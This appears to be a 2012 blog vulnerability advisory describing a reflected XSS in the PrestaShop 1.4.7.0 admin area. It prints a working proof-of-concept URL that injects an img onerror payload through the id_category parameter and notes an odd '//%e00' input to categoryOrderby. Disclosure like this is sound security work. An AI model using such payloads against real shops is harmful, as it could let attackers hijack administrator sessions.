Sunday, 18 March 2012

[EN]PrestaShop 1.4.7.0 - XSS-over-GET for/from admin


# TITLE ....... # XSS-over-GET in PrestaShop 1.4.7.0 (for/from admin only) .... #
# DATE ........ # 14.03.2012 ................................................. #
# AUTOHR ...... # http://hauntit.blogspot.com ................................ #
# SOFT LINK ... # http://www.prestashop.com .................................. #
# VERSION ..... # 1.4.7.0 .................................................... #
# TESTED ON ... # LAMP ....................................................... #
# ............................................................................ #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?

Simple XSS this time "for admin user only".

What's that mean:
To see vulnerability, go to Your login page and login as an admin.
Next in URL bar type 3).

#............................................#
# 3. Where is bug :)
http://prestashop_1.4.7.0/prestashop/admin12/index.php?tab=AdminCatalog&id_category=");<img src=moc onerror=alert(141012)>&categoryOrderby=name&categoryOrderway=asc&token=token

Vulnerable parameter is id_category.


By the way, there is one funny thing I found in this webapp too:
when You will set up parameter 'categoryOrderby' to '//%e00' (without ''), response will be 200 but page will... 'changed' ;]
hf
#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#............................................#
# Best regards
#

No comments:

Post a Comment

What do You think...?